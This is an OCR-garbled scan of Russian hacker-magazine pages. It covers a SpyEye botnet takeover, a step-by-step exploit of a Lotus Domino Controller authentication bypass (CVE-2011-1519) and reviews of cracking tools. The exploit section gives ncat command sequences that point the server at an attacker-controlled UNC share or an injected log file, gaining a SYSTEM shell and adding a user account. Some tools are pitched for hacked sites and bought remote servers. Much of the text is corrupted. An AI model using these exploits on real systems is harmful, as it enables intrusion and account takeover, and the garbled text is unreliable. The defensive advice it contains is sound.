зес . сопб^ 



А вот и конфигурационный файл настроек безопасности в кол- 
лекторе ЗруЕуе (зес.сопічд): 



Ііз'Еепіп^ рогЕ -Рог Іо^з = 



шѵзді изегпаше = 
шѵзді раззыогсі = 



[ РОЦМР ] Іі1=1=р: //Іігуіоок. ги/-Ргшср1/сз5/ 

[РОЦІМР] Іі1=1=р://1=гѵ1оок.пи/-Ргтср1/і5/ 

[РОЦІМР] ІтЕ'Ер ://~Егѵ1оок.ги/-Ргтср1/сопРіі5.іпі 
[РОЦІМР] РгЦді //І ігуіоок. ги /-Ргшсрі/ег гог Л о% 



[ РОЦМР ] ІтІ=1=р: //Іігѵіоок. ги/-Ргшср1/іпз1=а11ег/ 



Стоп, неужели это инсталлятор БруЕуе? Ботмастер допустил 
фатальную ошибку при установке бота и забыл удалить инстал- 
ляционную директорию, с помощью которой можно очень легко и 
просто проникнуть внутрь системы. Как видишь, тупой сканер, на- 
писанный на коленке за пару минут, вполне может помочь в угоне 
целого ботнета. 

СОБИРАЕМ УРОЖАЙ 

Как видишь, для получения контроля над ботнетами часто не 
нужны какие-то сложные исследования. Для захвата серверов 
киберпреступников используются их собственные методы. Есть 
ли другие ошибки в том же БруЕуе? Конечно, как и в любом другом 
продукте. На момент написания статьи в последней версии этого 
троянца было найдено четыре новых уязвимости. ПС 
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взлом 



Алексей Синцов, ОідііаІ Бесигііу (іѵѵіНег.сот/азіпІбоѵ) 



Пробивая І_о1:из, 
или история 
одного пентеста 




ІШД 

ІВМ І_оІи5 
ОотіпоБегѵег 
— программное 
обеспечение 
компании ІВМ І_оІиз 
БоНѵѵаге, серверная 
часть программного 
комплекса ІВМ І-оіиз 
Ыоіез. 



І'М'.'І 




ѵѵѵѵѵѵ.гегосІаѵіпШа- 

Ііѵе.сот — 2РІ; 
ѵѵѵѵѵѵ.іЬт.сот/зоД- 
ѵѵаге/ги/Іоіиз —ІВМ 

Ьоіиз БоДѵѵаге; 
Ьидігад. — ВидТгац; 
(Іі.паѵехргезз.сот — 

О^аѵа йесотрііег. 



ЭКСПЛУАТИРУЕМ ПРИВАТНУЮ ДЫРУ 
В ЬОТУЗ ВОМІЫО СОЫТВОІ.І.ЕК 



В этой статье я хотел бы рассказать об одном 
рабочем дне пентестера, которому, вопреки 
распространенному мнению, недостаточно просто 
запустить сканер и ждать отчета. Ему нередко 
приходится проявлять смекалку и прямо во время 
теста на проникновение писать сплоиты. 



ПРЕДЫСТОРИЯ 

Однажды я проверял надежность защиты очередного объекта. На этот 
раз вся инфраструктура была поднята за счет оборудования и софта ІВМ, 
что совершенно точно влетело заказчику в копеечку. Основную часть 
инфраструктуры, как это обычно бывает, составляли сервера І_оІіі5. В 
данном случае их было много. Очень много. На Ьэіііз была построена вся 
кухня компании: почта, совещания, управление контентом и т. п. Кстати, 
здесь вполне уместно вспомнить старую статью Александра Полякова, в 
которой он героически описывал свой опыт покорения этого ПО. Однако 
время беспощадно, и те трюки, которые ещё пару лет назад работали на 
ура, сегодня уже не дают абсолютно никакого профита. Обновленный 
монструозный Ьэіііз смотрел на меня как на обычного пользователя безо 
всяких прав. :) В такой ситуации любой начинающих взломщик полез 
бы на баг-трекеры и начал искать, к чему можно прицепиться, кроме 
устаревшего патез.пзі 1 в веб-сервисах. 

На серверах, которые я тестировал, стоял почти самый свежий І_оІіі5 
8.5.2РР2. Ни Метасплойт, ни ехрІоіі-сІЬ.сот не порадовали меня ничем 
дельным. Однако я решил не полагаться на такие попсовые источники 
эксплойтов и обратился за помощью в поиске багов без сплойтов клеите 
ВидТгар, 10 1, сайту ІВМ с зесигііу-обновлениями и Гуглу. В результате 
я нашел кучу уязвимостей, связанных с переполнением буфера в раз- 
личных сервисах, а также баг, позволяющий обойти аутентификацию и 



выполнить произвольный код. Однако эксплойтов для всех этих уязвимо- 
стей не существовало, а описания ошибок были очень поверхностными 
и указывали лишь общее направление, в котором нужно двигаться. На 
первый взгляд, такие указания никак не могли помочь в разработке 
хоть сколько-нибудь эффективного эксплойта, но надо было двигаться 
дальше. :) 

СКАЗ ПРО СѴЕ-201 1-1519 

Бегло просмотрев различные уязвимости, я остановился на баге с 
обходом аутентификации, позволяющем выполнить произвольный код 
(а это как раз то, о чем мечтает каждый пентестер). Эта уязвимость, по- 
лучившая на сайте 2БІ код 201-11-110, на момент проведения пентеста 
числилась как Осіау (сейчас уже имеется соответствующий патч). При- 
веду перевод описания указанной уязвимости с этого сайта: 

«Эта уязвимость позволяетудаленному атакующему выполнить 
произвольный код на уязвимой инсталляции І_оІіі5 Оотіпо Бегѵег 
СопІгоІІег. Для эксплуатации уязвимости не требуется аутентифи- 
кация. Проблема существует в реализации функционала удаленной 
консоли, которая по умолчанию слушаетТСР-порт 2050. При аутен- 
тификации пользователя сервер используетзначение параметра 
С00К1ЕРИЕ, в котором пользователь передает путь для получения 
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сохраненных аутентификационных данных. Приложение сравнивает 
данные из этого файла с данными пользователя. Путь может быть 
представлен в виде Ш\ІС, что позволит атакующему контролировать 
оба сравниваемых значения. Эксплуатируя эту уязвимость, удаленный 
атакующий сможет выполнить код с правами 5Ѵ5ТЕМ». 

Это описание вполне раскрывает всю суть проблемы: во время 
аутентификации атакующий может подменить параметр С00К1ЕРИЕ 
на параметр, содержащий путь к файлу \\еѵіІЬо5І:\ра55ѵѵогсІ_соокіе_ГіІе, 
который находится под контролем самого атакующего. В этот файл как 
раз и входит строка, сравниваемая с паролем, который вводится при 
аутентификации. Однако более подробная информация в описании 
уязвимости отсутствовала. 

ПРОТОКОЛ 

Итак, мы знаем, что уязвимая служба висит на порте 2050 . Это очевид- 
но, так как контроллер І_оІіі5 всегда находится там. Однако протокол 
общения лично мне был неизвестен. Погуглив информацию об этом 
протоколе, я ничего не нашел. В то же самое время мой напарник 
Александр Миноженко заметил, что автор бага, достаточно извест- 
ный пентестер и хакер из Швеции Патрик Карлсон, также является 
автором модулей для культового сканера птар. Некоторые из этих 
модулей как раз работают с І_оІи5-контроллером, например модуль 
для брутфорса и выполнения кода, предназначенный для тех случаев, 
когда пароль известен. 

Рассмотрим код этих модулей: 

зоскеі : гесоппесі ббЮ 

50ске1=:5епсІ("#АРІ\п") 

Боске1::5епсІ( ("#ІІІ %5Д$\п") :-Рогта1і(и5ег., разз) ) 
зоскеіі : гесеіѵе_1іпе5(1) 

50ске1=:5епсІ("#ЕХІТ\п") 



1ог1ипесііѵ.сот/пе5бкоѵ/б]\б1т1 ). который превратил )аг-файл С:\ 
Ргодгат РіІе5\ІВМ\Іо{и5\Оотіпо\Оа{а\ботіпо\іаѵа\сІсоп50Іе.)аг в кучу 
практически полностью читаемого Эаѵа-кода. Воспользовавшись 
поиском, я быстро нашел в полученных файлах класс МеѵѵСІіепЕсІазз, 
отвечающий за работу с консолью и аутентификацию. Давай взглянем 
на сам код: 

// 5І - строка ввода с 2Ѳ5Ѳ/1іср 

і~Р(б 1 . едиаіз ( "#ЕХІТ" ) ) 



і-Р(5І.едиаІ5Г#С00КІЕРИЕ"^ 
і-р(з 1:гіп§1:окепІ2ег . Ііа5МогеТокеп5( ) ) 

// Ага. Мы были правы: 

// #СООКІЕРИЕ <пѵть к файлѵ> 

соокіеРіІепате = 5ігіп§1іокепІ2ег.пех1іТокепО .ІігітО ; 
геііигп 7; 



Ш ! 1 . едиаіз ( "#ІІІ 

_ Щзіігіп^ііокепііег . базМогеТокепз ( ) ) 

// Ау тентификация... 

ЦБГ = 5І:гіп§1:окепІ2ег.пех1:Токеп(" . .ІігітО ; 
і~Р(цбг == пиІЛ 

геііигп 4; 

іІЧ зІігіп^Ііокепігег . ІіазМогеТокепзО ) 

// Пароль после запятой, это мы и так знали 

рыб = зІігіп^Ііокепігег.пехІіТокепО .ІігітО ; 
геііигп 0; 

Наши догадки о формате команд оказались верны. Теперь давай 
найдем интересующий нас процесс аутентификации: 



Как видно, аутентификация в І_оІиз-контроллере выглядит 
достаточно просто: это 55І_-туннель, в котором все команды идут 
открытом текстом и начинаются с символа «#». Таким образом, для 
аутентификации с логином абтіп и паролем раза нам нужно ввести 
команду «#Ш абтіп, разз». Этот факт не слишком приближает нас к по- 
ниманию того, как осуществить атаку, поскольку ни один модуль птар 
не использует путь С00К1ЕРИЕ для аутентификации. Однако, проявив 
немного смекалки, можно придумать команду «#СООКІЕРІІ_Е\\еѵіІ\ 
ПІе». Протестировав эту команду, я не получил ровным счетом ничего, 
даже уведомления об ошибке в синтаксисе (это говорит нам о том, что 
сама по себе команда вроде бы верна). 

ПОЧТИ РЕВЕРС-ИНЖИНИРИНГ 

После всех безуспешных попыток вникнуть в код алгоритма мне при- 
шлось декомпильнуть код контроллера. Выяснилось, что контроллер 
полностью написан на Эаѵа, поэтому и ЮА Рго, и Оля-дебаггер оказа- 
лись не нужны. Пригодился обыкновенный йб бесотрііег ( тетЬегз. 



К- н.гн. міі-тг л-' 

К : Іт-ч-лЗ-іпі 

Ш ІТ ^ 

■III I ЛмІП I Г. . Ні І-Г Н|| 

■ІІкТСТТ 

Ил Г>*1 >і 1 1- Г I И- \\1П.ИІ Я 1- ЛілІл.аЗ' г А у 

ля . і в . в . і 



• I шла.*.? эг<* 



Ій ІГ.РН 






Л и. .[■.,г л 

Г . ■■■■ мГс ІІІМІІІІЫ. I ||р I в'.я. І . Е .ТІСИ I 

Іярурі-НКг К н I I , ^рриіііііі. 

і: : ■.іѴіг ні \Ьіп і ■■■■-■ Лвг * иіыім і 

■ 3 пІІіЬйѴІГ^І^ІЕІП 



ГП 1 л> Ѵі і штѣьѵілыі . 



Ысаі-атака 



/* Цикл чтения ввода */ 



// КеабРготІІзег - эта функция была в предыдущем листинге 
іпіі і = КеабРготІІзег(); 



іШ == 6) { //Если #АРРІ_ЕТ_ 
аррІеІіСоппесІііоп = Іігие; 
сопіііпие; 



изегіп-Ро = ІІзегМапа§ег .бпбіізег(изг); 
і-р(изегіп-Ро == пиіі) { 

// Если юзер не найден... Баг! 
ЫгіІіеТоЦзег Г'МОТ КЕ6 АРМІІГ ) ; 
сопіііпие; 

} 



Ш ! аррІеІіСоппесІііоп) 

// Если не было #АРРІ_ЕТ. то обычная аутентификация 
Яа^=ѵгРѵРыб . ѵегі-РѵІІзегРаззыогб ( рысі . изегіп-Ро . изегР1лІР( ) ) ; 

еізе // Если же была команда #АРРІ_ЕТ 

// Аутентификация по СООКІЕ? Ага! 

Ла§ = ѵегі-руАрр!е1:ІІ5егСоокіе(и5г., рыб); 



> ыбі1е(1ігиеѴ. // еп б Іо ор 

і-р( Лае) / / Если результат ау тентиф икации положительный. 
// загрузить консоль управления, ура! 



Из этого кода видно, что нам необходимо «включить» уязвимый 
механизм аутентификации с помощью команды #АРРІ_ЕТ до исполь- 
зования #111 и #С00КІЕРІІ_Е. Кроме того, дело не дойдет до аутен- 
тификации, если ты не знаешь логин, который содержится в файле 
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взлом 



асітіпсіаіа.хті. Тем не менее, по ответу сервера мы сможем понять, 
существует такой логин или нет (ответ І\І0Т_РЕ6_А0МІМ из листинга)! 
Такая уязвимость называется «раскрытие существующих логинов 
системы». Для быстрой проверки я пробрутфорсил вручную несколь- 
ко самых популярных логинов в тестируемой системе и обнаружил 
юзера абт, который понадобится нам для реализации дальнейших 
этапов атаки. 

Теперь рассмотрим функцию авторизации ѵегі^уАррІеШзегСоокіе: 

//#СООКІЕРИЕ <соокіеРі1епате> 

Шс оокіеРіІепате == пиіі | | соокіеРі1епате.1еп§1:Іі() == 0) 
геііигп б а^; 

//Еще один баг - открытие файла без фильтрации ввода! 

Рііе біе = пеі РіІе(соокіеРіІепате) ; 



іприІіБІігеатгеасІег = пеш Іпри1:51:геатКеасІег( 
пеы Рі1еІпри1:$1:геат(б1е) . "ІІТР8") ; 



//з7 - содержимое файла соокіеРіІепате 

СІО { 

ШИ = зУ.іпсІехСНЧ'Чизег ". і)) <= 0) Ьгеак; 



51:гіп% 52 = %е1:51:гіп§Токеп(57. "изег=\"". "У", к У. 



51:гіп§ 53^ §е1:51:піп§Токеп(57 л "соокіе= \"", "У ". к); 

$1=гіп^ 54 = ^е1=51=гіп^Токеп( , 57 < "асІсІге55=\"" . "V". і. к У 



Шз 5.едиа І 5І § погеСазе(52 ’) && зб.еди аІзІ^ погеСазе ^З’) 
&& арр1е1:ІІ5егАсІсІге55.едиаІ5І§погеСа5е(54)) { //Ура! 

ба§ = 1:гие; Ьгеак; 

} 



} ыбіІеНгиеѴ. 

Из кода видно, что если введенные при аутентификации значения 
изегпате, раззѵѵогсі и асісігезз равны значениям изегпате, раззѵѵогсі 
и асісігезз из соокіебіе, который мы контролируем, то аутентификация 
пройдетуспешно! Таким образом, мы можем составить примерный 
алгоритм атаки: 

1. Скриптищеттег<изег>вуказанном намифайле. 

2. Вэтомтегесчитываютсязначения изегпате, раззѵѵогсі, асісігезз. 

3. Далеесчитанныепараметрысравниваютсястеми, которые ввел 
пользователь. 

4. Таккакпутькоткрываемомуфайлунефильтруется при вводе, мы 
можем указать путь к произвольному файлу и обойти таким образом 
злосчастную аутентификацию. 

РАНЕЕ ПРИВАТНЫЙ ЭКСПЛОЙТ ДЛЯ СѴЕ-201 1 -1 51 9 

Теперь перейдем непосредственно к реализации нашей атаки. 

1. Создаем файл соокіе.хті: 

<изег пате="изг" соокіе="рзы" асІсІпе55="сІ5есг^"> 

Какты уже понял, логин изг должен реально существовать. 

2. Сохраняем полученный файл л ибо у себя в шаре, либо на местном 
файловом сервере, указав путь\\бІе5егѵег\риЫіс\соокіе.хтІ. 

3. Теперьподключимся куязвимомусерверуспомощьюпсаТ 

псаі: --55І 1:аг%е1:1о1:и5_Ііо5І: 2050 

#АРІ 

#АРРІ_ЕТ 

#СООКІЕРІІ_Е \\б1езегѵег\риЬ1іс\соокіе.хт1 
#ІІ5ЕКАРРКЕ55 сІзесг§ 

#111 изг^рзм 
ѴАПР ІІ5ЕК 
#ЕХІТ 



ЮАР СМР.ехе /С пеі: изег асісі изегпате раззыопсі /АРР 
Ве§іпРа1:а 



Команда #АРРІ_ЕТ говорит серверу о том, что мы хотим исполь- 
зовать файл соокіе для аутентификации. Когда мы пробуем пройти 
аутентификацию с помощью команды #111, сервер пытается открыть 
файл, путь к которомууказан в #С00КІЕРІІ_Е. Из этого файла и берутся 
фейковые данные, которые сервер сравнивает с введенными нами 
логином и паролем. После команды #ЕХІТ запускается процесс об- 
работки ввода для аутентифицированного пользователя, то есть мы 
получаем доступ к серверу! Воттолько как им управлять? Если ты пом- 
нишь соответствующую статью Саши Полякова, то в ней описывалась 
команда ЮАй, фактически позволявшая нам запускать командную 
строку с параметрами. Единственный минус этого способа заключался 
в отсутствии обратной связи, то есть мы не могли видеть результат вы- 
полнения команды. Кроме того, в настоящий момент ІВМ настоятельно 
рекомендует защищать команду 1_0А0 с помощью дополнительного 
сервисного пароля, обойти который у нас уже не получится. Однако 
мы можем, как в птар-модулях, выполнять команды, вводя их после 
символа доллара. В данном случае метод ЮАР и сервисный пароль ни 
при чем, но определенные привилегии авторизованному пользовате- 
лю все равно нужны: 

псаі: - - 55І 1:а§е1:1о1:и5_Ііо5І: 2050 

#АРІ 

#АРРІ_ЕТ 

#СООКІЕРІІ_Е \\б1езегѵег\риЬ1іс\соокіе.хт1 

#115 Е КАРРИ Е55 сізесге 

#111 изг л рзы 

ѴАПР ІІ5ЕК 

#ЕХІТ 

$іл/Ііоаті 

ыбо атіВе^іпРа1:а 



Місгозобі: Ыіпсіоыз [Ѵегзіоп 6.1.7601] 

Сорупі^М: (с) 2009 Місгозобі: СогрогаНоп . АН гі§1і1:5 гезегѵесі. 



С : \Іо1:и5\Ротіпо\сІа1:а>ыІзоаті 
N1 АІІТНОКІТУХ5У5ТЕМ 



С ; Мо1:и5\Ротіпо\сІа1:а> 

Большим преимуществом этого способа является тот факт, что при 
его использовании мы видим еще и результат исполнения команды. 
Следуеттакже отметить, что в приведенном выше листинге директива 
#АРІ включает режим консоли, чистый АРІ без Эаѵа-вывода, — таким 
образом, работа с псаі становится еще более удобной. Кстати, если 
І_оІиз запущен с доменной учеткой, то мы вполне можем организовать 
атакутипа БМВРеІау. 

А ЧТО ЕСЛИ? 

Отлично, мы реверснули баг и фактически создали эксплойт. Это все? 
Нет, есть и еще кое-что. Во-первых, что ты будешь делать в случае 
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Пробивая І_оІи5, или история одного пентеста 



блокировки 5МВ-трафика с атакуемого сервера? Серверу, который 
имеет выход в интернет, вполне можно подсунуть ІІІМС (набор симво- 
лов, который указывает расположение файла в файловой системе). 
Если выхода в интернет не имеется, то сервер не сможет добраться 
до файла из-за банального межсетевого экрана. Кроме того, ІВМ вы- 
пустила простой, но беспощадный патч: теперь к параметру соокіеЛІе 
добавляется точка «.» в самом начале пути. Таким образом, если мы 
вводим что-то типа \\еѵіІ\соокіе\ЛІе, то в результате сервер пойдет 
открывать файл, путь к которому имеет следующий вид: .\\еѵіІ\соокіе\ 
ПІе, так что об ІІІМС здесь можно забыть. Кроме того, патч проводит ау- 
тентификацию клиента с помощью 551-сертификата, поэтому доступ к 
консоли без него получить не выйдет. Но давай забудем про сертифи- 
кат и решим первую проблему. В этом нам помогут сами программи- 
сты ІВМ! Из листинга, в котором осуществляется парсинг соокіеЛІе, 
видно, что кодеры хотели использовать что-то типа ХМЬфайла и 
ХМІ_-парсера. Но на самом деле код не парсит ХМІ_, а просто ищет под- 
строку в строке! Обрати внимание, что, по мнению программистов ІВМ, 
ХМЬфайл вида: 

<?хщ.1 ѵег5Іоп="1.0" епсосИп§="11ТР-8" ?> 

<изег паше="асІтіп" соокіе="сІ5есг^" асІсІге55="сІ5есг^"> 

аналогичен вот этому непотребству: 

Віа-Ыа-Ыасизег пате="асІтіп ,, хХХхсоокіе= ,, сІ5есп§ ,, ХасІсІпе55^ 

сІ5есг§"І\ІУА> 

Эта «особенность» позволяет нам инжектировать файл куки в 
локальные файлы сервера для последующего использования этого 
файла в процессе описанной выше фальшивой аутентификации. При- 
мерный сценарий атаки в данном случае может выглядетьтак: 

1. Инжектимсоокіеѵаіиезспомощьюсервиса МісгозоННТТРАРІ 
зегѵісе (здесь и далее\г\п — это просто Епіег): 

псаі: 1:аг^е1:Ііо5І: 49152 
СЕТ / <іі5ег НТТР/1.0\г\п 
\г\п 



псаі: •Еаг^еЛіоз'Е 49152 

СЕТ /и5ег="асІтіп"соокіе="ра55"асІсІпе55="Іі1:1:р://5І1:е.сот" 

НТТР/1.0\г\п 

\г\п 

2. Теперь лог-файл на сервере будет вы глядеть примерно так: 

#5оТ-Ьл/аге: МісговоТІ: НТТР АРІ 2.0 
#Ѵегзіоп: 1.0 

#Оаіе: 2011-08-22 09:19:16 



2011-08-26 11:53:30 10.10.10.101 52902 10.10.9.9 
47001 НТТР/1.0 СЕТ <ивег 404 - ІЧоѣРоипсІ - 
201 1- 08-26 11 :53:30 10.10.1 0.1 01 52905 10.10.9.9 
47001 НТТР/1.0 СЕТ пате="асІтіп"соокіе="ра55"асІсІге55=" 
ІтЫр: //5І1:е.сот"> 404 - ІМсгЕРоипсІ - 



Два запроса сделано не случайно: парсер от ІВМ будет искать 
строку «<изег » с пробелом в конце, а все пробелы в запросе коди- 
руются как «%20» (что нам не подходит). Таким образом, мы делаем 
первый запрос так, чтобы пробел после «<изег» поставил сам веб- 
сервер (между запросом и результатом мы увидим 404 ІѴІоіЕоипсІ). 

Во втором запросе дописываем все остальное. 

3. Теперь, послеполучения валидногофайла куки путем инжектирова- 
ния в логи веб-сервера, эксплойтим всеэтодело: 

псаі: --55І Ііа^еіііоііиз Иобі: 2050 
#АРІ 



ПРАВИЛА ВЫЖИВАНИЯ 
ПРИ ПЕНТЕСТЕ 



1. Никогда не запускай ничего низкоуровневого, если ты его 
досконально не знаешь. Например, если ты не знаешь, как работает 
АРР-Р0І50І\ІІІ\І6, не стоит злоупотреблять им на проверяемом 
объекте (конечно, иногда так хочется нажать красивую кнопочку 

в Саіп, но йо5 на заводе или в банке — несоразмерная плата за 
перехваченный пароль от почтового ящика какого-нибудь офис- 
менеджера на таіі.ги ). 

2. Никогда не запускай эксплойт, в котором ты не уверен. 

Эксплойт — это не то ПО, которое делает хакера хакером (или 
пентестера пентестером). Ведь если этот эксплойт связан, 
например, с ошибками при работе с памятью, то нужно быть 
уверенным не только в правильности версии уязвимого ПО, но и 
в правильности версии ОС, а иногда даже в том, что уязвимое ПО 
имеет соответствующее окружение (например, для использования 
некоторых эксплойтов необходимо установить Заѵа 6 для РОР- 
программы или отключить А5І_П). 

3. Спрашивай разрешения у ІТ-специалистов твоего клиента, если 
хочешь произвести какие-либо действия, которые потенциально 
могут вызвать отказ в обслуживании. 

4. У пентестера никогда не бывает лишнего времени. Запомни это. Не 
стоит ковыряться в одном сервисе двое суток только для того, чтобы 
написать офигенный эксплойт и проверить его на стабильность 

на копии тестируемой системы. Это, конечно, круто, но в итоге ты 
проэксплуатируешь только один баг, а времени на 99 других у тебя 
просто не останется. Нужно уметь выбирать приоритеты в условиях 
ограниченного времени и при отсутствии ресурсов. 



#АРРІ_ЕТ 

#СООКІЕРІІ_Е . Л. Л, ДыіпсІоы5\5у5І:ет32\1о§1і1е5\ІтІ:1:регг\ 
ІтЕіреггІ.Іо^ 

#Ц5ЕКАРРКЕ55 НЦр : / ПшЫег /азіпЪзоѵ 

#111 асІтіп,ра55 

#ЕХІТ 



$ыбоаті 

N1 АІІТНСЖІТУ/5У5ТЕМ 

В результате мы вполне можем получить профит и без ІІІМС, так как 
лог-файл может быть любым. 

ЗАЩИТА 

Стоит сказать несколько слов и о защите от разработанного нами 
способа атаки. Во-первых, атакуемый сервис используется сугубо 
для узких административных целей, поэтому он не должен быть до- 
ступен пользователям локальной сети, а также виден из интернета. 
Во-вторых, ни в коем случае не забывай про патчи и обновления. 
В-третьих, постарайся не забыть про сервисный пароль, который уста- 
навливается один-единственный раз через туже самую консоль (даже 
если сервер захватят, различные опасные команды вроде І_ОАО и ТЕИ 
будут защищены). И последнее — время от времени проводи аудит 
файла абтіпсіаіа.хті. Здесь перечислены все пользователи контрол- 
лера с паролями в МР5. Крометого, тутже прописаны их привилегии 
в виде десятичных значений. Значения 4, 25 и 26 говорят о том, что 
у этого пользователя есть привилегии на исполнение системных 
команд. Следи за тем, чтобы у незнакомых юзеров не было лишних 
полномочий, и да пребудет с тобой СилаІПЕ 
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Маг (ісд 884888, НирУ/зпіррег.ги) 



Х-ТООБ 

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 




Автор: 

зсагІеШ 

ЦШ.: 

Ьііг.ІуДі36т2 

Система: 

ѴѴіпсІоѵѵз 




ЛЕГКИЕ ИНЪЕКЦИИ С М55СІІ_ 
I N Л ЕСТЮЫ НЕІ.РЕР 




САМЫЙ БЫСТРЫЙ МБ5-КРЭКЕР 
В МИРЕ 




Автор: 

сеіі 697І845 

цкі.: 

Ьіиу/ѵпги2д8 

Система: 

ѴѴіпсІоѵѵз 




ОПРЕДЕЛЯЕМ АЛГОРИТМ 
ГЕНЕРАЦИИ ХЕША 



М55СИ Іщесііоп Неірег — это одна из множества 
утилит, предназначенных для работы с 501- 
инъекциями. Однако основная ее особенность 
состоит в том, что она заточена исключительно 
под базы данных М550І_. Такие утилиты не 
слишком часто встречаются в наше время, когда 
наиболее широкое распространение получили 
программы для раскрутки Му50І_-инъекций. 
Возможности и особенности проги: 

• поддержка всех последних версий МісгозоН 
5С!І_5егѵег; 

• дружественный и интуитивно понятный 6111- 
интерфейс; 

• легкое переключение между русским и 
английскимязыком; 

• несколько методов перебора; 

• извлечение имен баз, таблиц и столбцов; 

• извлечение имени пользователя и версии- 
базы данных; 

• дампингвсего и вся; 

• использование таблиц для сохранения дам- 
пов в понятном виде; 

• удобная сортировка колонок. 

Начать работу с программой не просто, а 
очень просто! М55СІІ_ Іщесііоп Неірег не тре- 
бует установки, так что распаковывай архив 
в любое удобное для тебя место на диске, 
вбивай в соответствующее поле ІІРІ_ уязвимо- 
го скрипта (например, зіІе.сот/зсгірІ.азрЗісМ) 
и начинай работу. 



Мечтал ли ты во время брута Мйб-хешей о заоб- 
лачной скорости вычислений и задействовании 
абсолютно всех ресурсов своего компьютера? 
Тогда специально для тебя спешу представить 
замечательный инструмент для взлома хешей 
ВагзѴѴР — ѴѴогІсІ Разіезі Мй5 сгаскег. Как ты 
понял из названия, автор позиционирует свое 
творение как самый быстрый Мйб-крякер в 
мире. В чём заключается его уникальность? 
Давай обратимся к плюсам и минусам проги: 

+ отличная поддержка многоядерныхпроцес- 
соров; 

+ версии для работы на видео- и центральном 
процессоре; 

+ работа в режиме командной строки; 

- заточен исключительно под Мйб; 

- неимеетвизуальногоинтерфейса; 

- позволяет брутить не более одного хеша 
одновременно. 

Атеперь немного фактов: 

1. Программа используетвсеядра ЦП на 
полную. Тесты показали, что на I піеі Соге 2 
ОиасІ 0X6700 (3,01 6Нг) брутфорс выжимает 
около 200 миллионов паролей в секунду при 
использовании всехчетырехядер! 

2 . Утилита замечательно работаете видеокар- 
тами РасІеоп:одна изее версий использует 
технологию АМР ВРООК, которая представ- 
ляет собой аналог всем известной СІЮАот 
ІМѴісІіа. 



Наверняка тебе часто попадались хеши, 
алгоритм генерации которых был неизвестен. 
Вероятно, в таких случаях ты пытался узнать 
название движка, с которого был слит дамп 
базы данных, а затем потрошил его исходни- 
ки на предмет этого самого алгоритма. Но что 
делать, если определить тип движка не удается, 
а расшифровать хеш хочется до безумия? Спешу 
тебя обрадовать! Замечательная программа 
«Вгиіиз ЬазЬез. Ыеѵѵ депегаііоп» предоставляет 
прекрасную возможность для автоматического 
определения практически любого алгоритма 
хеширования! Автор изначально позициониро- 
вал свое творение как очередную программу 
для брутфорса, но в действительности, сам того 
не подозревая, накодил совершенно другую, 
уникальную и крайне полезную вещь. :-) 
Атеперь сам алгоритм определения типа 
хеша: 

1. Регистрируемся на взломанном ресурсе. 

2 . Ищем вдоступном намдампехешотизвестно- 
го пароля, введенного тобой при регистрации. 

3. Вводим полученную информацию в соответ- 
ствующие поля программы. 

4 . Жмем на восклицательныйзнакиждем, 
когда определится типхеша. 

Кстати, ты можешь разработать собствен- 
ный алго с помощью встроенного конструкто- 
ра. Всего доступен 6 131 066 257 801 вариант. 
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Автор: 

ХМСО Бесигііу 
РезеагсН І_аЬз 

іл?і_: 

ѵѵѵѵѵѵ.хтсоіг/ 

рапЬизІег.НітІ 

Система: 

*піх/ѵѵіп/тас 



АУДИТ РСІ 055 У ТЕБЯ ДОМА! 

РАІЧВизІег — это консольная утилита, пред- 
назначенная для поиска номеров кредитных 
карт, хранящихся в открытом виде в твоей (и 
не только) системе. Программа может быть 
крайне полезна для проведения аудита на 
соответствие требованиям стандарта РСІ 055, 
так как он строго-настрого запрещает хранить 
РАІ\І (номер) карты в открытом виде. Таким 
образом, РАІМВизІег будет не лишней для 
всех РСІ 05А, системных администраторов, 
разработчиков, аудиторов и специалистов по 
расследованию инцидентов. 

Особенности и функциональные возмож- 
ности утилиты: 

• полная поддержка ѴѴіпсіоѵѵб, І_іпих, Мас05Х; 

• идентификация бренда карты (ѴІ5А, 



Мазіегсагсі, Атегісап Ехргезз, .КВ, Оізсоѵег, 
СЫпа ІІпіоп); 

• идентификацияэмисионногобанка (более 
1000 ВІІМ); 

• обнаружение РАЫ в следующих БД и 
системах: Му5СИ_, М55СІІ_ (бэкап-файлы), 
Ро5Ідге50І_, ЕхсеІ, ѴМѵѵагеѴМйК, Огасіе 
(дампы); 

• парсингсжатыхфайлов прямо в памяти (.2ІР, 
Ы, .ТО 2); 

• низкое количестволожныхсрабатываний. 
Работать с прогой достаточно просто: за- 
пускаем ее из командной строки («./рапЬизІег 

../») и получаем отчет о том, где и какие дан- 
ные были найдены (карта платежной системый 
такой-то в файле таком-то). 




Автор: 

ТІМНОК 

ЦКІ_: 

ЬіІ.Іу/ѵІЫісМ 

Система: 

ѴѴіпсІоѵѵз 






Автор: 

БиРбеоМіх 

цри 

ЬіЫу/ІХхІ_кт 

Система: 

ѴѴіпсІоѵѵз 




ПР0БИВАМ БСРЕЕИ-ЛОКИ 




СКАНЕР УЯЗВИМОСТЕЙ 


НАДЕДИКАХ 


ДЛЯ -100М1-А| 



ѴѴЕВ51ІР6ЕРѴ, 

ИЛИ «ВСЕ ВКЛЮЧЕНО» 



Если ты хоть раз находил на раздачах хороший 
дедик, то вполне мог столкнуться с таким 
явлением, как зсгееп-лок. Программы, пред- 
назначенные для этого, позволяюттебе видеть 
рабочий стол дедика, но в то же время бло- 
кируют любые действия, пока ты не введешь 
правильный пароль. Конечно, можно забить 
на приглянувшуюся тебе машинку, но есть и 
другой выход. Итак, встречаем ОйМдг — удоб- 
ный менеджер и пробиватель зсгееп-локов 
для дедиков. Особенности и функциональные 
возможности программы: 

• удобный интерфейс; 

• пробиваниебольшинства скринлоков; 

• выбор автозагружаемой программы; 

• возможностьменятьразмеры окна; 

• функции изменения порта, редиректа портов 
и подключения дисков; 

• форсирование поддержки буфера обмена 
(дажееслион выключен, прога заставитего 
работать); 

Благодаря перечисленным функциям, 
ОйМдг может пригодиться не только обычному 
пользователю, но и владельцу или продавцу 
целого парка дедиков. Самая главная особен- 
ность программы заключается в том, что она 
позволяет не только пробивать скринлоки, 
но и снимать множество других ограничений, 
мешающих твоей комфортной работе с удален- 
ным компьютером. 



0ѴѴА5Р Зоотіа! ѴиІпегаЬіІіІу 5саппег — это один 
из самых популярных и культовых 0ѴѴА5Р'овских 
проектов. Как ясно из названия, этот перловый 
скрипт представляет собой сканер уязвимостей 
для известнейшей СМ5 Зоотіа! Его база данных 
уже давно используется для вполне успешно- 
го развития множества сторонних онлайн- и 
офлайн-проектов. Однако мы не будем на них 
останавливаться и рассмотрим основные воз- 
можности и особенности самого сканера: 

• определениеверсиидвижка; 

